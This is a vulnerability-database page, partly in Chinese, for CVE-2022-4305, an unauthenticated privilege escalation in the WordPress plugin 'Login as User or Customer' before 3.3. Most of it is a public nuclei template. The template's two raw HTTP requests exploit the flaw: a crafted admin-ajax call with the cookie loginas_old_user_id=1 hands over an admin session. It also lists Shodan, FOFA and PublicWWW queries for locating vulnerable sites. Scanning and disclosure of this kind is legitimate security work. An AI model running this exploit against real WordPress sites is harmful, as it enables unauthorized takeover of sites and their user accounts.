CVE-2022-4305: Login as User or Customer < 3.3 - Privilege Escalation

日期: 2025-08-01 | 影响软件: Login as User or Customer | POC: 已公开

漏洞描述

The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.

PoC代码[已公开]

id: CVE-2022-4305

info:
  name: Login as User or Customer < 3.3 - Privilege Escalation
  author: r3Y3r53
  severity: critical
  description: |
    The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.
  impact: |
    Unauthenticated attackers can obtain valid admin sessions by exploiting missing authorization checks in the Login as User or Customer plugin, potentially gaining complete control over the WordPress site and all user accounts.
  remediation: |
    Fixed in version 3.3
  reference:
    - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4305
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4305
    cwe-id: CWE-269
    epss-score: 0.88487
    epss-percentile: 0.99481
    cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp-buy
    product: login_as_user_or_customer_\(user_switching\)
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/login-as-customer-or-user
    fofa-query: body=/wp-content/plugins/login-as-customer-or-user
    publicwww-query: /wp-content/plugins/login-as-customer-or-user
  tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy,vuln

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1
        Host: {{Hostname}}
        Cookie: loginas_old_user_id=1
      - |
        GET /wp-admin/users.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 200
          - contains(header_2, "text/html")
          - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')
        condition: and
# digest: 4a0a00473045022026719e4b90c50b6dae87ed47fbcd0bd5ceb35fd0dc9d42efe4698fbad2848b8c0221008b9ee2b506f29fba53081c1354f36b9ab18d8ae1be05fd24aec6ac9d1b08a7b7:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-4305.yaml

相关漏洞推荐